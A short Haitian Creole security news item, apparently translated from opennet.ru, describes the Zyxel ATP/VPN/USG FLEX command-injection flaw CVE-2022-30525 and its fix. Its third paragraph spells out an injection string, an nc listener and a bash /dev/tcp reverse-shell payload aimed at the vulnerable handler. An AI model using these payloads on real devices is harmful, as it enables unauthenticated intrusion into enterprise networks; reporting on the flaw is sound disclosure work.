Vilnerabilite nan firewall Zyxel ki pèmèt ekzekisyon kòd san otantifikasyon

Yo te idantifye yon vilnerabilite kritik (CVE-2022-30525) nan aparèy Zyxel nan seri ATP, VPN ak USG FLEX, ki fèt pou òganize operasyon firewall, IDS ak VPN nan antrepriz, ki pèmèt yon atakè ekstèn egzekite kòd sou la. aparèy san dwa itilizatè san otantifikasyon. Pou fè yon atak, yon atakè dwe kapab voye demann nan aparèy la lè l sèvi avèk pwotokòl HTTP/HTTPS la. Zyxel te fikse vilnerabilite nan aktyalizasyon firmwèr ZLD 5.30 la. Dapre sèvis Shodan la, gen kounye a 16213 aparèy ki kapab vilnerab sou rezo mondyal la ki aksepte demann atravè HTTP/HTTPS.

Operasyon fèt pa voye kòmandman ki fèt espesyalman pou moun kap okipe entènèt la /ztp/cgi-bin/handler, aksesib san otantifikasyon. Se pwoblèm nan ki te koze pa mank de netwayaj apwopriye nan paramèt demann lè egzekite kòmandman sou sistèm nan lè l sèvi avèk apèl la os.system yo itilize nan bibliyotèk lib_wan_settings.py a ak egzekite lè yo trete operasyon an setWanPortSt.

Pou egzanp, yon atakè ka pase fisèl la "; ping 192.168.1.210;" ki pral mennen nan ekzekisyon an nan "ping 192.168.1.210" lòd sou sistèm nan. Pou jwenn aksè nan kokiy lòd la, ou ka kouri "nc -lvnp 1270" sou sistèm ou a, ak Lè sa a, kòmanse yon koneksyon ranvèse lè w voye yon demann nan aparèy la ak '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’.

Sous: opennet.ru

Add nouvo kòmantè